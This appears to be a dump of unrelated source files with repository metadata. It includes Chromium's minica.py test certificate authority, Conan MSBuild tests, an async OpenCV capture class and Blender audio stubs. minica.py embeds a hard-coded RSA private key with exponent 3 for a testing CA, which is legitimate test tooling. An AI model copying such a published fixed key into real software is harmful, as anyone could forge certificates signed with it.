    utils.plot_experiment(evals, lower, mean, upper, legend_name = 'Default settings')
    plt.legend()
    plt.show()
    # you can also plot multiple experiments at the same time using
    # utils.plot_experiments, e.g. if you have two experiments 'default' and
    # 'tuned' both in the 'partition' directory, you can call
    # utils.plot_experiments('partition', ['default', 'tuned'],
    # rename_dict={'default': 'Default setting'})
    # the rename_dict can be used to make reasonable entries in the legend -
    # experiments that are not in the dict use their id (in this case, the
    # legend entries would be 'Default settings' and 'tuned')
acf68fcbb935059182661b275a106bb3c74472ad | 10,487 | py | Python | net/tools/testserver/minica.py | domenic/mojo | 53dda76fed90a47c35ed6e06baf833a0d44495b8 | [
"BSD-3-Clause"
] | 27 | 2016-04-27T01:02:03.000Z | 2021-12-13T08:53:19.000Z | net/tools/testserver/minica.py | domenic/mojo | 53dda76fed90a47c35ed6e06baf833a0d44495b8 | [
"BSD-3-Clause"
] | 2 | 2017-03-09T09:00:50.000Z | 2017-09-21T15:48:20.000Z | net/tools/testserver/minica.py | domenic/mojo | 53dda76fed90a47c35ed6e06baf833a0d44495b8 | [
"BSD-3-Clause"
] | 17 | 2016-04-27T02:06:39.000Z | 2019-12-18T08:07:00.000Z | # Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import asn1
import hashlib
import os
# This file implements very minimal certificate and OCSP generation. It's
# designed to test revocation checking.
def RandomNumber(length_in_bytes):
  '''RandomNumber returns a random number of length 8*|length_in_bytes| bits,
  built big-endian from os.urandom output.'''
  # bytearray yields ints under both Python 2 and 3.  The original iterated
  # the raw bytes and called ord() on each element, which breaks on
  # Python 3 where iterating bytes already yields ints.
  n = 0
  for byte in bytearray(os.urandom(length_in_bytes)):
    n = (n << 8) | byte
  return n
def ModExp(n, e, p):
  '''ModExp returns n^e mod p'''
  # Delegate to the built-in three-argument pow(), which performs modular
  # exponentiation in C.  It matches the hand-rolled square-and-multiply
  # loop this replaces for every case used here, and is additionally
  # correct for the degenerate modulus p == 1 (where the old loop
  # returned 1 instead of 0).
  return pow(n, e, p)
# PKCS1v15_SHA256_PREFIX is the ASN.1 prefix for a SHA256 signature: the DER
# DigestInfo header that precedes the 32-byte digest in PKCS#1 v1.5 padding.
# NOTE(review): str.decode('hex') is Python 2 only.
PKCS1v15_SHA256_PREFIX = '3031300d060960864801650304020105000420'.decode('hex')
class RSA(object):
  '''Minimal RSA private key that produces PKCS#1 v1.5 / SHA-256 signatures.
  Written against Python 2 string semantics (see Sign).'''
  def __init__(self, modulus, e, d):
    '''modulus, e (public exponent) and d (private exponent) are plain
    Python integers.'''
    self.m = modulus
    self.e = e
    self.d = d
    # modlen: length of the modulus in bytes, computed by shifting the
    # modulus away eight bits at a time.
    self.modlen = 0
    m = modulus
    while m != 0:
      self.modlen += 1
      m >>= 8
  def Sign(self, message):
    '''Returns the PKCS#1 v1.5 signature of SHA-256(message), exactly
    modlen bytes long.'''
    digest = hashlib.sha256(message).digest()
    prefix = PKCS1v15_SHA256_PREFIX
    # Build EM = 0x00 0x01 FF..FF 0x00 || DigestInfo || digest as a list of
    # one-character strings (the first two 0xff entries are overwritten).
    em = ['\xff'] * (self.modlen - 1 - len(prefix) - len(digest))
    em[0] = '\x00'
    em[1] = '\x01'
    # NOTE(review): Python 2 only -- extending a list with a str appends
    # its individual characters; this and the ord() below break on Python 3.
    em += "\x00" + prefix + digest
    # Interpret EM as a big-endian integer ...
    n = 0
    for x in em:
      n <<= 8
      n |= ord(x)
    # ... apply the private exponent ...
    s = ModExp(n, self.d, self.m)
    # ... and serialize back to big-endian bytes, left-padded with zeros to
    # the full modulus length.
    out = []
    while s != 0:
      out.append(s & 0xff)
      s >>= 8
    out.reverse()
    return '\x00' * (self.modlen - len(out)) + asn1.ToBytes(out)
  def ToDER(self):
    '''Returns the DER encoding of SEQUENCE { modulus, e } (the public
    part of the key).'''
    return asn1.ToDER(asn1.SEQUENCE([self.m, self.e]))
def Name(cn = None, c = None, o = None):
  '''Name returns an X.501 Name: an ASN.1 SEQUENCE of relative distinguished
  names for the given common name, country and organization, in that order.
  Attributes passed as None are omitted.'''
  names = asn1.SEQUENCE([])
  # Each present attribute becomes SET { SEQUENCE { type-OID, value } }.
  # (The original repeated this append block verbatim three times.)
  for attr_type, value in ((COMMON_NAME, cn),
                           (COUNTRY, c),
                           (ORGANIZATION, o)):
    if value is not None:
      names.children.append(
        asn1.SET([
          asn1.SEQUENCE([
            attr_type, value,
          ])
        ])
      )
  return names
# The private key and root certificate name are hard coded here:
# This is the private key (modulus, public exponent e=3, private exponent d).
KEY = RSA(0x00a71998f2930bfe73d031a87f133d2f378eeeeed52a77e44d0fc9ff6f07ff32cbf3da999de4ed65832afcb0807f98787506539d258a0ce3c2c77967653099a9034a9b115a876c39a8c4e4ed4acd0c64095946fb39eeeb47a0704dbb018acf48c3a1c4b895fc409fb4a340a986b1afc45519ab9eca47c30185c771c64aa5ecf07d,
          3,
          0x6f6665f70cb2a9a28acbc5aa0cd374cfb49f49e371a542de0a86aa4a0554cc87f7e71113edf399021ca875aaffbafaf8aee268c3b15ded2c84fb9a4375bbc6011d841e57833bc6f998d25daf6fa7f166b233e3e54a4bae7a5aaaba21431324967d5ff3e1d4f413827994262115ca54396e7068d0afa7af787a5782bc7040e6d3)
# And the same thing in PEM format
KEY_PEM = '''-----BEGIN RSA PRIVATE KEY-----
MIICXAIBAAKBgQCnGZjykwv+c9AxqH8TPS83ju7u1Sp35E0Pyf9vB/8yy/PamZ3k
7WWDKvywgH+YeHUGU50ligzjwsd5Z2UwmakDSpsRWodsOajE5O1KzQxkCVlG+znu
60egcE27AYrPSMOhxLiV/ECftKNAqYaxr8RVGaueykfDAYXHccZKpezwfQIBAwKB
gG9mZfcMsqmiisvFqgzTdM+0n0njcaVC3gqGqkoFVMyH9+cRE+3zmQIcqHWq/7r6
+K7iaMOxXe0shPuaQ3W7xgEdhB5XgzvG+ZjSXa9vp/FmsjPj5UpLrnpaqrohQxMk
ln1f8+HU9BOCeZQmIRXKVDlucGjQr6eveHpXgrxwQObTAkEA2wBAfuduw5G0/VfN
Wx66D5fbPccfYFqLM5LuTimLmNqzK2gIKXckB2sm44gJZ6wVlumaB1CSNug2LNYx
3cAjUwJBAMNUo1hbI8ugqqwI9kpxv9+2Heea4BlnXbS6tYF8pvkHMoliuxNbXmmB
u4zNB5iZ6V0ZZ4nvtUNo2cGr/h/Lcu8CQQCSACr/RPSCYSNTj948vya1D+d+hL+V
kbIiYfQ0G7Jl5yIc8AVw+hgE8hntBVuacrkPRmaviwwkms7IjsvpKsI3AkEAgjhs
5ZIX3RXHHVtO3EvVP86+mmdAEO+TzdHOVlMZ+1ohsOx8t5I+8QEnszNaZbvw6Lua
W/UjgkXmgR1UFTJMnwJBAKErmAw21/g3SST0a4wlyaGT/MbXL8Ouwnb5IOKQVe55
CZdeVeSh6cJ4hAcQKfr2s1JaZTJFIBPGKAif5HqpydA=
-----END RSA PRIVATE KEY-----
'''
# Root certificate CN
ISSUER_CN = "Testing CA"
# All certificates are issued under this policy OID, in the Google arc:
CERT_POLICY_OID = asn1.OID([1, 3, 6, 1, 4, 1, 11129, 2, 4, 1])
# These result in the following root certificate:
# -----BEGIN CERTIFICATE-----
# MIIB0TCCATqgAwIBAgIBATANBgkqhkiG9w0BAQUFADAVMRMwEQYDVQQDEwpUZXN0aW5nIENBMB4X
# DTEwMDEwMTA2MDAwMFoXDTMyMTIwMTA2MDAwMFowFTETMBEGA1UEAxMKVGVzdGluZyBDQTCBnTAN
# BgkqhkiG9w0BAQEFAAOBiwAwgYcCgYEApxmY8pML/nPQMah/Ez0vN47u7tUqd+RND8n/bwf/Msvz
# 2pmd5O1lgyr8sIB/mHh1BlOdJYoM48LHeWdlMJmpA0qbEVqHbDmoxOTtSs0MZAlZRvs57utHoHBN
# uwGKz0jDocS4lfxAn7SjQKmGsa/EVRmrnspHwwGFx3HGSqXs8H0CAQOjMzAxMBIGA1UdEwEB/wQI
# MAYBAf8CAQAwGwYDVR0gAQEABBEwDzANBgsrBgEEAdZ5AgHODzANBgkqhkiG9w0BAQUFAAOBgQA/
# STb40A6D+93jMfLGQzXc997IsaJZdoPt7tYa8PqGJBL62EiTj+erd/H5pDZx/2/bcpOG4m9J56yg
# wOohbllw2TM+oeEd8syzV6X+1SIPnGI56JRrm3UXcHYx1Rq5loM9WKAiz/WmIWmskljsEQ7+542p
# q0pkHjs8nuXovSkUYA==
# -----END CERTIFICATE-----
# If you update any of the above, you can generate a new root with the
# following line:
# print DERToPEM(MakeCertificate(ISSUER_CN, ISSUER_CN, 1, KEY, KEY, None))
# Various OIDs (standard names noted for reference)
AIA_OCSP = asn1.OID([1, 3, 6, 1, 5, 5, 7, 48, 1]) # id-ad-ocsp
AUTHORITY_INFORMATION_ACCESS = asn1.OID([1, 3, 6, 1, 5, 5, 7, 1, 1]) # id-pe-authorityInfoAccess
BASIC_CONSTRAINTS = asn1.OID([2, 5, 29, 19]) # id-ce-basicConstraints
CERT_POLICIES = asn1.OID([2, 5, 29, 32]) # id-ce-certificatePolicies
COMMON_NAME = asn1.OID([2, 5, 4, 3]) # id-at-commonName
COUNTRY = asn1.OID([2, 5, 4, 6]) # id-at-countryName
HASH_SHA1 = asn1.OID([1, 3, 14, 3, 2, 26]) # sha1
OCSP_TYPE_BASIC = asn1.OID([1, 3, 6, 1, 5, 5, 7, 48, 1, 1]) # id-pkix-ocsp-basic
ORGANIZATION = asn1.OID([2, 5, 4, 10]) # id-at-organizationName
PUBLIC_KEY_RSA = asn1.OID([1, 2, 840, 113549, 1, 1, 1]) # rsaEncryption
SHA256_WITH_RSA_ENCRYPTION = asn1.OID([1, 2, 840, 113549, 1, 1, 11]) # sha256WithRSAEncryption
def MakeCertificate(
    issuer_cn, subject_cn, serial, pubkey, privkey, ocsp_url = None):
  '''MakeCertificate returns a DER encoded certificate, signed by privkey.

  A root (self-issued) certificate is produced when issuer_cn equals
  subject_cn; in that case the country/organization fields are omitted and
  a basicConstraints CA extension is added.  If ocsp_url is given, an
  authorityInfoAccess extension pointing at it is included.
  '''
  extensions = asn1.SEQUENCE([])
  # Default subject name fields
  c = "XX"
  o = "Testing Org"
  if issuer_cn == subject_cn:
    # Root certificate.
    c = None
    o = None
    extensions.children.append(
      asn1.SEQUENCE([
        # Bug fix: was the undefined lowercase name `basic_constraints`,
        # which raised NameError whenever a root certificate was generated.
        BASIC_CONSTRAINTS,
        True,
        asn1.OCTETSTRING(asn1.ToDER(asn1.SEQUENCE([
          True, # IsCA
          0, # Path len
        ]))),
      ]))
  if ocsp_url is not None:
    extensions.children.append(
      asn1.SEQUENCE([
        AUTHORITY_INFORMATION_ACCESS,
        False,
        asn1.OCTETSTRING(asn1.ToDER(asn1.SEQUENCE([
          asn1.SEQUENCE([
            AIA_OCSP,
            # The URL is wrapped in a context tag 6 (uniformResourceIdentifier).
            asn1.Raw(asn1.TagAndLength(0x86, len(ocsp_url)) + ocsp_url),
          ]),
        ]))),
      ]))
  # Every certificate carries the test policy OID.
  extensions.children.append(
    asn1.SEQUENCE([
      CERT_POLICIES,
      False,
      asn1.OCTETSTRING(asn1.ToDER(asn1.SEQUENCE([
        asn1.SEQUENCE([ # PolicyInformation
          CERT_POLICY_OID,
        ]),
      ]))),
    ])
  )
  tbsCert = asn1.ToDER(asn1.SEQUENCE([
    asn1.Explicit(0, 2), # Version
    serial,
    asn1.SEQUENCE([SHA256_WITH_RSA_ENCRYPTION, None]), # SignatureAlgorithm
    Name(cn = issuer_cn), # Issuer
    asn1.SEQUENCE([ # Validity
      asn1.UTCTime("100101060000Z"), # NotBefore
      asn1.UTCTime("321201060000Z"), # NotAfter
    ]),
    Name(cn = subject_cn, c = c, o = o), # Subject
    asn1.SEQUENCE([ # SubjectPublicKeyInfo
      asn1.SEQUENCE([ # Algorithm
        PUBLIC_KEY_RSA,
        None,
      ]),
      asn1.BitString(asn1.ToDER(pubkey)),
    ]),
    asn1.Explicit(3, extensions),
  ]))
  return asn1.ToDER(asn1.SEQUENCE([
    asn1.Raw(tbsCert),
    asn1.SEQUENCE([
      SHA256_WITH_RSA_ENCRYPTION,
      None,
    ]),
    asn1.BitString(privkey.Sign(tbsCert)),
  ]))
def MakeOCSPResponse(issuer_cn, issuer_key, serial, ocsp_state):
  '''Returns a DER encoded OCSPResponse for serial, signed by issuer_key.

  The reported certificate status (good / revoked / unknown) is selected by
  ocsp_state; all timestamps are fixed so the output is deterministic.
  '''
  # https://tools.ietf.org/html/rfc2560
  # CertID identifies the target certificate by SHA-1 hashes of the issuer
  # name and issuer key, plus the serial number.
  issuer_name_hash = asn1.OCTETSTRING(
      hashlib.sha1(asn1.ToDER(Name(cn = issuer_cn))).digest())
  issuer_key_hash = asn1.OCTETSTRING(
      hashlib.sha1(asn1.ToDER(issuer_key)).digest())
  cert_status = None
  if ocsp_state == OCSP_STATE_REVOKED:
    # CertStatus revoked [1]: carries the revocationTime.
    cert_status = asn1.Explicit(1, asn1.GeneralizedTime("20100101060000Z"))
  elif ocsp_state == OCSP_STATE_UNKNOWN:
    # CertStatus unknown [2]: empty value, context-specific tag 2.
    cert_status = asn1.Raw(asn1.TagAndLength(0x80 | 2, 0))
  elif ocsp_state == OCSP_STATE_GOOD:
    # CertStatus good [0]: empty value, context-specific tag 0.
    cert_status = asn1.Raw(asn1.TagAndLength(0x80 | 0, 0))
  else:
    raise ValueError('Bad OCSP state: ' + str(ocsp_state))
  # ResponseData, serialized first so it can be signed below.
  basic_resp_data_der = asn1.ToDER(asn1.SEQUENCE([
    asn1.Explicit(2, issuer_key_hash),  # responderID, byKey [2]
    asn1.GeneralizedTime("20100101060000Z"), # producedAt
    asn1.SEQUENCE([
      asn1.SEQUENCE([ # SingleResponse
        asn1.SEQUENCE([ # CertID
          asn1.SEQUENCE([ # hashAlgorithm
            HASH_SHA1,
            None,
          ]),
          issuer_name_hash,
          issuer_key_hash,
          serial,
        ]),
        cert_status,
        asn1.GeneralizedTime("20100101060000Z"), # thisUpdate
        asn1.Explicit(0, asn1.GeneralizedTime("20300101060000Z")), # nextUpdate
      ]),
    ]),
  ]))
  # BasicOCSPResponse = ResponseData + signatureAlgorithm + signature.
  basic_resp = asn1.SEQUENCE([
    asn1.Raw(basic_resp_data_der),
    asn1.SEQUENCE([
      SHA256_WITH_RSA_ENCRYPTION,
      None,
    ]),
    asn1.BitString(issuer_key.Sign(basic_resp_data_der)),
  ])
  # Outer OCSPResponse wrapper.
  resp = asn1.SEQUENCE([
    asn1.ENUMERATED(0),  # responseStatus: successful
    asn1.Explicit(0, asn1.SEQUENCE([
      OCSP_TYPE_BASIC,
      asn1.OCTETSTRING(asn1.ToDER(basic_resp)),
    ]))
  ])
  return asn1.ToDER(resp)
def DERToPEM(der):
  '''Wraps DER certificate bytes in a PEM CERTIFICATE envelope.

  The Python 2 'base64' codec emits the body already split into
  newline-terminated 64-character lines.
  '''
  return ''.join([
      '-----BEGIN CERTIFICATE-----\n',
      der.encode('base64'),
      '-----END CERTIFICATE-----\n',
  ])
# Certificate-status selectors accepted by MakeOCSPResponse and
# GenerateCertKeyAndOCSP below.
OCSP_STATE_GOOD = 1
OCSP_STATE_REVOKED = 2
OCSP_STATE_INVALID = 3
OCSP_STATE_UNAUTHORIZED = 4
OCSP_STATE_UNKNOWN = 5

# unauthorizedDER is an OCSPResponse with a status of 6:
# SEQUENCE { ENUM(6) }
# (Python 2: str.decode('hex') turns the hex digits into raw bytes.)
unauthorizedDER = '30030a0106'.decode('hex')
def GenerateCertKeyAndOCSP(subject = "127.0.0.1",
                           ocsp_url = "http://127.0.0.1",
                           ocsp_state = OCSP_STATE_GOOD,
                           serial = 0):
  '''GenerateCertKeyAndOCSP returns a (cert_and_key_pem, ocsp_der) where:
       * cert_and_key_pem contains a certificate and private key in PEM format
         with the given subject common name and OCSP URL.
       * ocsp_der contains a DER encoded OCSP response or None if ocsp_url is
         None'''
  # A serial of 0 means "pick one at random".
  if serial == 0:
    serial = RandomNumber(16)

  cert_pem = DERToPEM(
      MakeCertificate(ISSUER_CN, bytes(subject), serial, KEY, KEY,
                      bytes(ocsp_url)))

  if ocsp_url is None:
    ocsp_der = None
  elif ocsp_state == OCSP_STATE_UNAUTHORIZED:
    ocsp_der = unauthorizedDER
  elif ocsp_state == OCSP_STATE_INVALID:
    # Deliberately malformed response body.
    ocsp_der = '3'
  else:
    ocsp_der = MakeOCSPResponse(ISSUER_CN, KEY, serial, ocsp_state)

  return (cert_pem + KEY_PEM, ocsp_der)
| 29.962857 | 271 | 0.678173 |
acf690651c3a8a8910c39109fe654b856288443f | 2,747 | py | Python | conans/test/unittests/tools/microsoft/test_msbuild.py | JoachimKuebart-TomTom/conan | bf716c094d6b3f5acd727eed3c4b4fe1ad9e1c00 | [
"MIT"
] | null | null | null | conans/test/unittests/tools/microsoft/test_msbuild.py | JoachimKuebart-TomTom/conan | bf716c094d6b3f5acd727eed3c4b4fe1ad9e1c00 | [
"MIT"
] | null | null | null | conans/test/unittests/tools/microsoft/test_msbuild.py | JoachimKuebart-TomTom/conan | bf716c094d6b3f5acd727eed3c4b4fe1ad9e1c00 | [
"MIT"
] | null | null | null | import mock
import os
import textwrap
from mock import Mock
from conan.tools.microsoft import MSBuild, MSBuildToolchain
from conans.model.conf import ConfDefinition
from conans.model.env_info import EnvValues
from conans.test.utils.mocks import ConanFileMock, MockSettings
from conans.tools import load
from conans import ConanFile, Settings
def test_msbuild_cpu_count():
    # The msbuild-specific conf (max_cpu_count=23) should take precedence
    # over the generic tools.build:processes value when composing the
    # msbuild command line.
    c = ConfDefinition()
    c.loads(textwrap.dedent("""\
        tools.microsoft.msbuild:max_cpu_count=23
        tools.build:processes=10
        """))
    settings = MockSettings({"build_type": "Release",
                             "compiler": "gcc",
                             "compiler.version": "7",
                             "os": "Linux",
                             "arch": "x86_64"})
    conanfile = ConanFileMock()
    conanfile.settings = settings
    conanfile.conf = c.get_conanfile_conf(None)
    msbuild = MSBuild(conanfile)
    cmd = msbuild.command('project.sln')
    # /m is MSBuild's max-cpu-count switch; 23 proves the specific conf won.
    assert '/m:23' in cmd
def test_msbuild_toolset():
    # msvc 19.3 should map to Visual Studio 2022's v143 platform toolset.
    settings = Settings({"build_type": ["Release"],
                         "compiler": {"msvc": {"version": ["19.3"]}},
                         "os": ["Windows"],
                         "arch": ["x86_64"]})
    conanfile = ConanFile(Mock(), None)
    conanfile.settings = "os", "compiler", "build_type", "arch"
    conanfile.initialize(settings, EnvValues())
    # NOTE: compiler must be assigned before its sub-setting
    # compiler.version; the Settings model resolves children lazily.
    conanfile.settings.build_type = "Release"
    conanfile.settings.compiler = "msvc"
    conanfile.settings.compiler.version = "19.3"
    conanfile.settings.os = "Windows"
    conanfile.settings.arch = "x86_64"
    msbuild = MSBuildToolchain(conanfile)
    assert 'v143' in msbuild.toolset
def test_msbuild_standard():
    # cppstd=20 with msvc 19.3 should surface as stdcpp20 in the generated
    # MSBuild toolchain props file.
    settings = Settings({"build_type": ["Release"],
                         "compiler": {"msvc": {"version": ["19.3"], "cppstd": ["20"]}},
                         "os": ["Windows"],
                         "arch": ["x86_64"]})
    conanfile = ConanFile(Mock(), None)
    conanfile.folders.set_base_generators(".")
    conanfile.install_folder = os.getcwd()
    conanfile.conf = ConfDefinition()
    conanfile.settings = "os", "compiler", "build_type", "arch"
    conanfile.initialize(settings, EnvValues())
    # Parent settings before sub-settings (compiler before version/cppstd).
    conanfile.settings.build_type = "Release"
    conanfile.settings.compiler = "msvc"
    conanfile.settings.compiler.version = "19.3"
    conanfile.settings.compiler.cppstd = "20"
    conanfile.settings.os = "Windows"
    conanfile.settings.arch = "x86_64"
    msbuild = MSBuildToolchain(conanfile)
    # vcvars_path is patched so generate() does not need a local Visual
    # Studio install; it writes conantoolchain_release_x64.props to cwd.
    with mock.patch("conan.tools.microsoft.visual.vcvars_path", mock.MagicMock(return_value=".")):
        msbuild.generate()
    assert '<LanguageStandard>stdcpp20</LanguageStandard>' in load('conantoolchain_release_x64.props')
| 37.121622 | 102 | 0.631962 |
acf691583ff7d733f141d9366740fb6cfb40ed2c | 1,486 | py | Python | video_capture.py | desmondcheongzx/AR-window-hardware | 34b19c5c09a3ab3ce43a19c62e978f38c1ba635d | [
"MIT"
] | null | null | null | video_capture.py | desmondcheongzx/AR-window-hardware | 34b19c5c09a3ab3ce43a19c62e978f38c1ba635d | [
"MIT"
] | null | null | null | video_capture.py | desmondcheongzx/AR-window-hardware | 34b19c5c09a3ab3ce43a19c62e978f38c1ba635d | [
"MIT"
] | null | null | null | import cv2
import threading
class VideoCaptureAsync:
    """Wraps cv2.VideoCapture and grabs frames on a background thread.

    `read()` always returns the most recently captured frame without
    blocking on the camera. Fixes over the original: `__enter__` is added
    (the class defined `__exit__` but not `__enter__`, so using it in a
    `with` statement raised AttributeError), `stop()` no longer crashes
    when the capture was never started, and `__exit__` stops the reader
    thread before releasing the capture to avoid a read-after-release race.
    """

    def __init__(self, src=0, width=480, height=360, driver=None):
        # src may be a device index or a stream URL; driver optionally
        # selects a cv2 capture backend.
        self.src = src
        if not driver:
            self.cap = cv2.VideoCapture(self.src)
        else:
            self.cap = cv2.VideoCapture(self.src, driver)
        self.cap.set(cv2.CAP_PROP_FRAME_WIDTH, width)
        self.cap.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
        # Prime grabbed/frame so read() works before start() is called.
        self.grabbed, self.frame = self.cap.read()
        self.started = False
        self.read_lock = threading.Lock()
        self.thread = None

    def get(self, var1):
        """Proxies cv2.VideoCapture.get for property `var1`."""
        return self.cap.get(var1)

    def set(self, var1, var2):
        """Proxies cv2.VideoCapture.set, setting property `var1` to `var2`."""
        self.cap.set(var1, var2)

    def start(self):
        """Starts the background capture thread; returns self (or None if
        already running, matching the original behaviour)."""
        if self.started:
            print('Asynchroneous video capturing has already been started.')
            return None
        self.started = True
        self.thread = threading.Thread(target=self.update, args=())
        self.thread.start()
        return self

    def update(self):
        """Thread body: continuously overwrites the latest frame."""
        while self.started:
            grabbed, frame = self.cap.read()
            with self.read_lock:
                self.grabbed = grabbed
                self.frame = frame

    def read(self):
        """Returns (grabbed, frame-copy) for the most recent capture."""
        with self.read_lock:
            frame = self.frame.copy()
            grabbed = self.grabbed
        return grabbed, frame

    def stop(self):
        """Stops the capture thread; safe to call even if never started."""
        self.started = False
        if self.thread is not None:  # fix: was an AttributeError when unstarted
            self.thread.join()
            self.thread = None

    def __enter__(self):
        # Added so the existing __exit__ actually makes this a usable
        # context manager.
        return self

    def __exit__(self, exec_type, exec_value, traceback):
        # Stop the reader thread before releasing the capture it reads from.
        self.stop()
        self.cap.release()
| 27.518519 | 76 | 0.585464 |
acf6917f0de09e129bf3ac819d14f20cdb33fae6 | 258 | py | Python | chapter_02_data_structures/section_2_2_collections/2_21_collections_counter_most_common.py | wuxiaofeng8764/P3SL_Example | 8ce1877af7372211b20836f799a8c44679577b7c | [
"MIT"
] | null | null | null | chapter_02_data_structures/section_2_2_collections/2_21_collections_counter_most_common.py | wuxiaofeng8764/P3SL_Example | 8ce1877af7372211b20836f799a8c44679577b7c | [
"MIT"
] | null | null | null | chapter_02_data_structures/section_2_2_collections/2_21_collections_counter_most_common.py | wuxiaofeng8764/P3SL_Example | 8ce1877af7372211b20836f799a8c44679577b7c | [
"MIT"
] | null | null | null | import collections
# Tally how often each character occurs in the system word list, then
# report the three most frequent characters.
letter_counts = collections.Counter()
with open('/usr/share/dict/words', 'rt') as word_file:
    for word in word_file:
        letter_counts.update(word.rstrip().lower())

print('Most common:')
for letter, frequency in letter_counts.most_common(3):
    print('{}: {:>7}'.format(letter, frequency))
acf691acbbc26ec2c22eb0d63a312f7950f1e6fa | 4,542 | py | Python | premade_modules/2.79/2.79b/aud.py | echantry/fake-bpy-module | 004cdf198841e639b7d9a4c4db95ca1c0d3aa2c7 | [
"MIT"
] | null | null | null | premade_modules/2.79/2.79b/aud.py | echantry/fake-bpy-module | 004cdf198841e639b7d9a4c4db95ca1c0d3aa2c7 | [
"MIT"
] | null | null | null | premade_modules/2.79/2.79b/aud.py | echantry/fake-bpy-module | 004cdf198841e639b7d9a4c4db95ca1c0d3aa2c7 | [
"MIT"
] | null | null | null | AUD_DEVICE_JACK = None
'''constant value 3 '''
AUD_DEVICE_NULL = None
'''constant value 0 '''
AUD_DEVICE_OPENAL = None
'''constant value 1 '''
AUD_DEVICE_SDL = None
'''constant value 2 '''
AUD_DISTANCE_MODEL_EXPONENT = None
'''constant value 5 '''
AUD_DISTANCE_MODEL_EXPONENT_CLAMPED = None
'''constant value 6 '''
AUD_DISTANCE_MODEL_INVALID = None
'''constant value 0 '''
AUD_DISTANCE_MODEL_INVERSE = None
'''constant value 1 '''
AUD_DISTANCE_MODEL_INVERSE_CLAMPED = None
'''constant value 2 '''
AUD_DISTANCE_MODEL_LINEAR = None
'''constant value 3 '''
AUD_DISTANCE_MODEL_LINEAR_CLAMPED = None
'''constant value 4 '''
AUD_FORMAT_FLOAT32 = None
'''constant value 36 '''
AUD_FORMAT_FLOAT64 = None
'''constant value 40 '''
AUD_FORMAT_INVALID = None
'''constant value 0 '''
AUD_FORMAT_S16 = None
'''constant value 18 '''
AUD_FORMAT_S24 = None
'''constant value 19 '''
AUD_FORMAT_S32 = None
'''constant value 20 '''
AUD_FORMAT_U8 = None
'''constant value 1 '''
AUD_STATUS_INVALID = None
'''constant value 0 '''
AUD_STATUS_PAUSED = None
'''constant value 2 '''
AUD_STATUS_PLAYING = None
'''constant value 1 '''
AUD_STATUS_STOPPED = None
'''constant value 3 '''
# Auto-generated API stub (fake-bpy-module style): attributes are
# placeholders assigned None purely so IDEs/type checkers can resolve
# names; the bare string after each attribute is scraped documentation
# text, not an executable docstring.
class Device:
    # NOTE(review): this class-level string looks mis-scraped -- it
    # describes unlock(), not the Device class; verify against the
    # upstream aud module documentation.
    '''Unlocks the device after a lock call, see lock() for details. '''
    channels = None
    '''The channel count of the device. '''
    distance_model = None
    '''The distance model of the device. '''
    doppler_factor = None
    '''The doppler factor of the device. This factor is a scaling factor for the velocity vectors in doppler calculation. So a value bigger than 1 will exaggerate the effect as it raises the velocity. '''
    format = None
    '''The native sample format of the device. '''
    listener_location = None
    '''The listeners’s location in 3D space, a 3D tuple of floats. '''
    listener_orientation = None
    '''The listener’s orientation in 3D space as quaternion, a 4 float tuple. '''
    listener_velocity = None
    '''The listener’s velocity in 3D space, a 3D tuple of floats. '''
    rate = None
    '''The sampling rate of the device in Hz. '''
    speed_of_sound = None
    '''The speed of sound of the device. The speed of sound in air is typically 343.3 m/s. '''
    volume = None
    '''The overall volume of the device. '''
# Auto-generated stub; no members were scraped for this class.
class Factory:
    # NOTE(review): the string below appears to describe a volume-changing
    # method, not the Factory class itself -- confirm upstream.
    '''Changes the volume of a factory. '''
    pass
# Auto-generated playback-handle stub: each attribute is a None
# placeholder with scraped documentation text following it.
class Handle:
    # NOTE(review): this class-level string looks mis-scraped -- it
    # describes stop(), not the Handle class itself.
    '''Stops playback. '''
    attenuation = None
    '''This factor is used for distance based attenuation of the source. '''
    cone_angle_inner = None
    '''The opening angle of the inner cone of the source. If the cone values of a source are set there are two (audible) cones with the apex at the location of the source and with infinite height, heading in the direction of the source’s orientation. In the inner cone the volume is normal. Outside the outer cone the volume will be cone_volume_outer and in the area between the volume will be interpolated linearly. '''
    cone_angle_outer = None
    '''The opening angle of the outer cone of the source. '''
    cone_volume_outer = None
    '''The volume outside the outer cone of the source. '''
    distance_maximum = None
    '''The maximum distance of the source. If the listener is further away the source volume will be 0. '''
    distance_reference = None
    '''The reference distance of the source. At this distance the volume will be exactly volume. '''
    keep = None
    '''Whether the sound should be kept paused in the device when its end is reached. This can be used to seek the sound to some position and start playback again. '''
    location = None
    '''The source’s location in 3D space, a 3D tuple of floats. '''
    loop_count = None
    '''The (remaining) loop count of the sound. A negative value indicates infinity. '''
    orientation = None
    '''The source’s orientation in 3D space as quaternion, a 4 float tuple. '''
    pitch = None
    '''The pitch of the sound. '''
    position = None
    '''The playback position of the sound in seconds. '''
    relative = None
    '''Whether the source’s location, velocity and orientation is relative or absolute to the listener. '''
    status = None
    '''Whether the sound is playing, paused or stopped (=invalid). '''
    velocity = None
    '''The source’s velocity in 3D space, a 3D tuple of floats. '''
    volume = None
    '''The volume of the sound. '''
    volume_maximum = None
    '''The maximum volume of the source. '''
    volume_minimum = None
    '''The minimum volume of the source. '''
# Stub for the aud module's exception type; body intentionally empty.
class error:
    pass
| 27.035714 | 420 | 0.686262 |
acf692cb8673c3544a764e1491e7a45163f831ef | 1,082 | py | Python | Python/Searches/Breadth First Search.py | CaptainSora/synaptic-twilight | 5f5f29f783e22fd91e9a0567eecc4461376d51bd | [
"MIT"
] | null | null | null | Python/Searches/Breadth First Search.py | CaptainSora/synaptic-twilight | 5f5f29f783e22fd91e9a0567eecc4461376d51bd | [
"MIT"
] | null | null | null | Python/Searches/Breadth First Search.py | CaptainSora/synaptic-twilight | 5f5f29f783e22fd91e9a0567eecc4461376d51bd | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Tue Feb 21 22:09:41 2017
@author: Joseph
"""
# Undirected 12-vertex sample graph as an adjacency-set mapping: each
# vertex maps to the set of its neighbours, and every edge is listed in
# both directions (e.g. 'A' in graph['B'] and 'B' in graph['A']).
graph = {'A': set(['B', 'D']),
         'B': set(['A', 'C', 'G']),
         'C': set(['B', 'I', 'J']),
         'D': set(['A', 'E', 'J']),
         'E': set(['D', 'F']),
         'F': set(['E', 'J', 'K']),
         'G': set(['B']),
         'H': set(['I', 'L']),
         'I': set(['C', 'H']),
         'J': set(['C', 'D', 'F']),
         'K': set(['F', 'L']),
